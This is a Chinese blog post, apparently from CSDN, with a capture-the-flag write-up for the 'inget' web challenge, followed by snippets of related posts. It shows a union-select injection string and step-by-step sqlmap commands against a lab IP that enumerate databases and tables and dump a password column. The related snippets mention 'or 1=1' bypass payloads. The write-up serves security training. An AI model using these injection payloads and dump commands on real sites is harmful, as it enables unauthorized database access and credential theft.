攻防世界inget(sqlmap方法)

最新推荐文章于 2025-01-16 22:56:45 发布
最新推荐文章于 2025-01-16 22:56:45 发布
阅读量1.4k 收藏 5
点赞数 22
CC 4.0 BY-SA版权
文章标签: web sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_78972359/article/details/138463686
1.题目分析

启动靶机,打开网页

页面显示让我们输入id,尝试绕过。尝试在url构造进行输入

/?id=1'union select 2,3--+
//后面的--+是注释后面的代码,类似的还有---,#,这里用的是--+

确实是sql注入,我用的是sqlmap,也可以在url构造,与sqlmap同理

2.sqlmap使用 

不会sqlmap指令的可以看看大佬博客

打开虚拟机,终端输入sqlmap,如果是以下页面则说明可用

输入以下指令

sqlmap -u 'http://61.147.171.105:51742/?id=1' --dbs

这个id是我们测试的参数,如果没这个id的话会像这样报错

加上id,--dbs是用来爆数据库的,查看当前数据使用的数据库,中间可能会有提示,输入y即可

这里我们查看第一个数据库cyber,输入指令,可以查看cyber库下的表名

sqlmap -u 'http://61.147.171.105:54720/?id=1' -D cyber --tables

可以看到cyber库下就一个表,也叫cyber,输入指令查看表内字段

sqlmap -u 'http://61.147.171.105:54720/?id=1' -D cyber -T cyber --columns

cyber表内有三个字段,首先怀疑这个pw,查看字段内容,输入指令

sqlmap -u 'http://61.147.171.105:54720/?id=1' -D cyber -T cyber -C pw --dump

pw字段里我们得到了flag

【网络安全 | CTF】攻防世界 inget 解题详析
等风来
07-23 6518
由于该语句为真,却无回显,故可排除数字型注入。语句,再根据回显做下一步判断。思路:尝试利用or构造。使用sqlmap爆数据。
【网络安全 | CTF】攻防世界 get_post 解题详析
等风来
05-20 5768
题目描述:X老师告诉小宁同学HTTP通常使用两种请求方法,你知道是哪两种吗?使用Hack Bar提交GET参数Payload:?a=1
攻防世界-inget
m0_62094846的博客
10-06 1444
看到说id,可能id是参数,尝试了几个数,页面都没有变化,也没有延时回显。看了wp,确实是sql注入,注入点是id,用sqlmap扫就可以出来。源代码里没有东西,御剑之类的也扫不到。
攻防世界 inget
qq_53105813的博客
10-15 1407
攻防世界wp
攻防世界-inget(简单的SQL注入、万能密码)
Welcome To Myon'Blog !
04-14 8197
inget(简单的SQL注入)、手工注入、万能密码原理、sqlmap实现、常用参数
攻防世界inget
qq_55510415的博客
04-22 709
现在传入id=1' or 1=1-- -就变成了'id=1' or 1=1-- -',id=1或者1=1返回都是true,-- abc表示注释后面代码。由此可获得flag。对url进行修改添加/?原本当传入id的时候例如id=1就是'id=1'思路:通过id进行sql注入。请输入ID,并尝试绕过。
攻防世界】CTF 网络安全学习180天 之 inget_please enter id,and try to bypass
2401_84248681的博客
05-08 628
SQL注入是一种利用应用程序对用户输入的处理不当而导致的安全漏洞。攻击者通过在用户输入中插入恶意的SQL代码,从而欺骗应用程序执行非预期的数据库操作。翻译过来就是输入id,且尝试绕过,查看源代码,发现源代码只有这一句话,也没有其他信息。这个题目的题目描述为无,但在进入了题目界面后,提示了这样子的一句话。CTF攻防就是信息的整理和收集,然后把所有细节加起来考虑出方向。下面将是我的思路,以id作为参数然后作为绕过。结果就是无事发生,是老样子。Python爬虫学习专栏。方向:WebSQL注入。
攻防世界 web
最新发布
2406_87429010的博客
01-16 865
如果 preg_match 检测到这些恶意模式,就可以采取相应的措施,比如拒绝处理该输入,从而在一定程度上防止SQL注入攻击。因为参数在URL中,所以它有长度限制,且安全性稍差,不过GET请求比较简单直观,适合获取数据,像在浏览器中输入网址查看网页内容,就是发送GET请求。它将数据放在请求体中发送给服务器,数据不会像GET请求那样直接暴露在URL中,安全性相对较高,而且对数据长度的限制相对宽松。输入1,页面正常,输入1 and 1=2 页面正常说明是字符型注入。这道题传参,使用get,post方式。
攻防世界】CTF 网络安全学习180天 之 inget
Bing_Geng的博客
11-15 1271
综合的考察了SQL注入绕过,且提示较其他难度为1的题目较少,是一个学习SQL注入的入门经典例题
攻防世界--inget
qq_73611185的博客
09-09 329
然后就 不会做了(web知识面非常浅薄,采用边做题边学知识的做法) ,开始在网上找wp,看了wp说这里使用sql注入的万能语句?我们知道SQL语句中where相当于判断语句,并且是由 or 连接的,所以 username=’’ 和 1=1 中有一个为真就为真。原文链接:https://blog.csdn.net/weixin_41607190/article/details/82818804。我们分析下语义,在SQL语法中 # 是注释符,所以后面的语句都会杯注释掉,那么上面的语句就等价于。
攻防世界inget&php_rce&Web_php_include&unserialize3
weixin_74473832的博客
03-15 967
查了一下str.replace (old, new max]) 有三个参数,old是需要替换的值,new是替换后的值,max是最多替换的次数。这里的意思大概就是要用get方式提交一个page参数,但是会过滤掉page的值里面的php://。代码的意思大概是有一个xctf的类,会调用wakeup魔术方法,然后会回显bad requests。根据题目说的php-rce,去浏览器搜索这个版本的thinkphp框架的历史命令执行漏洞。这里用的是or,前后关系中只要一个对的,这个关系式就是真的,所以成功绕过。
攻防世界14-inget
weixin_49765221的博客
04-18 1560
sql注入的入门
攻防世界-宜兴网信办-inget
m0_49025459的博客
12-23 1158
题目访问题目路径这个题目的意思就是请输入ID,然后尝试绕过,那应该就是SQL注入,但是呢,我是个懒狗,我直接跑sqlmap先跑数据库名爆表爆字段爆数据。
[攻防世界]-Web:inget解析
2301_79326813的博客
01-28 1140
查看网页很明显,他是要我们输入id这里我尝试了直接爆破,没有成功。
攻防世界-Web-inget新手
wangwei011的博客
05-16 1753
攻防世界-Web-inget
攻防世界-web-inget
mlws1900的博客
08-23 917
这题目搞了半天没思路,又是从get里面传参,又是添加了header内容,一点反应都没。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值